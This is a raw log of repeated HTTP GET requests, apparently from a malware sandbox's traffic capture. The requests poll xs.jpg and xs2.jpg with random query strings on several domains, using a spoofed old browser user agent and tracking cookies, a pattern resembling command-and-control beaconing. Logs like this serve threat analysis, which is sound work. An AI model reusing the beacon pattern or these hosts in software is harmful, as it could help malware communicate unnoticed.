        Source: global trafficHTTP traffic detected: GET /xs.jpg?826f9a23=-2106615261 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159380|1720159259|4|31|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2ec75429=1983553864 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159381|1720159260|4|31|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?2d6766a9=1799042376 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?43b77b4=71006132 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3385c362=1755862958 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159384|1720159259|4|32|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1bbff591=1396695219 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159385|1720159259|4|32|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?7d9f9d7d=2027870327 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159385|1720159260|4|32|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?ff31f566=-54012520 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?b51d7645=-1986834599 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?a08af9ff=72863736 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159389|1720159259|4|33|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?5a3b4a05=2006910499 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159389|1720159259|4|33|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?86fb760c=-1561768388 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159390|1720159260|4|33|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?6307741b=-972101578 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?38373338=-101659400 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?52638f9=777519297 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159393|1720159259|4|34|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?cdc80b22=164654932 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159394|1720159259|4|34|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?146c7f21=685309506 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159394|1720159260|4|34|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a01325a2=1076251460 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?13966ddd=657251258 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?140bbffd=1681571825 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159397|1720159259|4|35|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?ec575cc=1239108860 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159398|1720159259|4|35|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?e3527f49=-1924530908 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159398|1720159260|4|35|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1b715571=-151256839 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?c74bfbd0=-951321648 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?eb7bcec3=-1032623031 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159401|1720159259|4|36|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?ca9a0e20=1607346784 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159402|1720159259|4|36|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?608cb344=1129067416 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159402|1720159260|4|36|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?bd60bc68=2059499728 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?7f13e7e5=-154726670 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?20062123=-1608604241 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159407|1720159259|5|37|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?cd024f52=-1710973276 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159407|1720159259|4|37|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?81924fcd=-1962922341 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159408|1720159260|5|37|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?5b13db53=-1899589314 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?669212f9=-838957873 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?da20f51d=-2058775774 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159411|1720159259|4|38|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?eb94bb2e=-342574290 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159411|1720159259|4|38|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?70445cbe=-228113746 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159412|1720159260|4|38|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?972d623=951125202 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?d82b8544=1622021392 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?b09f39d0=-732261200 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159415|1720159259|4|39|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?dbb6fc30=-1826294640 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159416|1720159259|4|39|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?58f235fe=2037783532 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159416|1720159260|4|39|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?ea782f73=-1083666855 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?f026a792=-265902190 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?d74bda62=-1365789500 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159419|1720159259|4|40|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?3f66d776=-1144003526 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159420|1720159259|4|40|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?ae7223c4=-1178038512 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159420|1720159260|4|40|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?c74c2087=-923187898 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?c94ba6e9=1541600443 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9036add6=1088075608 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159423|1720159259|4|41|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?737daee5=-839468140 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159424|1720159259|4|41|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?215ba763=1119309510 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159424|1720159260|4|41|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?df150ca5=981355486 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?76eabd35=-1523882990 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2896226b=680927851 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159428|1720159259|4|42|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?e8fd1062=1978557004 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159428|1720159259|4|42|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?bb7b9d3b=846387121 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159429|1720159260|4|42|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?35cb7c96=435346908 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?5428f9c6=-1471024244 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9c274079=2103526465 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159432|1720159259|4|43|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?e50bb34e=-227213044 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159432|1720159259|4|43|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?78f5da0c=2029378060 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159433|1720159260|4|43|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?d6d21078=-2072628888 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?91c553b8=1192578784 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3cded4aa=-1441279834 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159436|1720159259|4|44|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?62886082=-988757756 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159437|1720159259|4|44|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?f69d2558=-472420344 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159437|1720159260|4|44|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a4a56c66=-1532662682 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?832f1280=-1987233920 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?54daef13=-24064711 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159441|1720159259|4|45|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?99af4b5=1289201064 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159441|1720159259|4|45|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?da885230=-1257200544 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159442|1720159260|4|45|0; snkz=8.46.123.33
